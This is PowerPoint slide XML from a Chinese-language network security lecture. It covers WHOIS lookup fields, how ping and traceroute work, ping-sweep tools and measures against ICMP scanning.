              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>是否被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>注册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>注册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>详细资料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="0" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可以查询到的信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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域名所有者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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域名及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址对应信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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联系方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>到期日期</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="20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域名注册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>日期</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="0" dirty="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dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>所使用的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>DNS Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="0" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148487"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8" y="1844824"/>
            <a:ext cx="492932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191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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Echo request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>消息，等待</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Echo Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>消息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每秒发一个包，显示响应输出，计算网络来回的时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最后显示统计结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>丢包率</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理</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2456892"/>
            <a:ext cx="5868144" cy="440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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2014944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EF73C968-8484-4D41-A001-77F4C38F0D14}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331778" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全攻击方式（从信息流动的角度）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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266604"/>
            <a:ext cx="7129785" cy="559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03771594"/>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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有许多命令行参数，可以改变缺省的行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不成功：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机未开启</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由、网关设置不正确</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网卡配置不正确</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>timeout</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被防火墙阻止</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令行参数</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152077037"/>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en-US" altLang="zh-CN"/>
              <a:t>Pinger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WS_Ping ProPack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536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032720"/>
            <a:ext cx="581501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1889720"/>
            <a:ext cx="6053138"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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33969872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a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议来发送数据包：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用检测并记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描的工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>入侵检测系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在防火墙或路由器中设置允许进出自己网络的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分组类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描预防措施</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1163887848"/>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457200" y="3834209"/>
            <a:ext cx="8229600" cy="2559614"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送若干短命</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> （生存时间）：避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包在网络中无限循环和收发，节省网络资源，并能使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的发送者能收到告警消息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始递增</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Traceroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由跟踪原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698"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5E8E8EEA-D5EB-4401-AEA3-1E38273F3C6F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29701"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2"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4"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7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1828800"/>
            <a:ext cx="1905000" cy="457200"/>
            <a:chOff x="960" y="1584"/>
            <a:chExt cx="1200" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205832" name="Line 8"/>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29722" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="1584"/>
              <a:ext cx="1152" cy="192"/>
              <a:chOff x="384" y="1008"/>
              <a:chExt cx="1152" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29723" name="Rectangle 10"/>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9724" name="Line 11"/>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36" name="Text Box 12"/>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5837" name="Text Box 13"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="205838" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2635250"/>
            <a:ext cx="1066800" cy="519113"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="2420938"/>
            <a:ext cx="1905000" cy="1371600"/>
            <a:chOff x="960" y="1872"/>
            <a:chExt cx="1200" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205840" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1872"/>
              <a:ext cx="1200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="17961" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="tx1"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205841" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1872"/>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29712" name="Group 18"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1059" y="2016"/>
              <a:ext cx="1098" cy="720"/>
              <a:chOff x="1086" y="2016"/>
              <a:chExt cx="1098" cy="720"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="205843" name="Rectangle 19"/>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5844" name="Text Box 20"/>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29715" name="Line 21"/>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46" name="Text Box 22"/>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29717" name="Line 23"/>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Line 24"/>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49" name="Text Box 25"/>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5850" name="Text Box 26"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="205851" name="Text Box 27"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="205852" name="Text Box 28"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2105986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5838"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="205838"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20583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5838"/>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ltLang="zh-CN"/>
              <a:t>Traceroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由跟踪原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>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0B797128-48AF-4EB1-9395-7C60307CE8DE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30725"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6"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7"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0729" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1828800"/>
            <a:ext cx="1905000" cy="457200"/>
            <a:chOff x="960" y="1584"/>
            <a:chExt cx="1200" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="206856" name="Line 8"/>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0752" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="1584"/>
              <a:ext cx="1152" cy="192"/>
              <a:chOff x="384" y="1008"/>
              <a:chExt cx="1152" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30753" name="Rectangle 10"/>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0754" name="Line 11"/>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0" name="Text Box 12"/>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6861" name="Text Box 13"/>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30730" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="2420938"/>
            <a:ext cx="1905000" cy="1371600"/>
            <a:chOff x="960" y="1872"/>
            <a:chExt cx="1200" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="206863" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1872"/>
              <a:ext cx="1200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
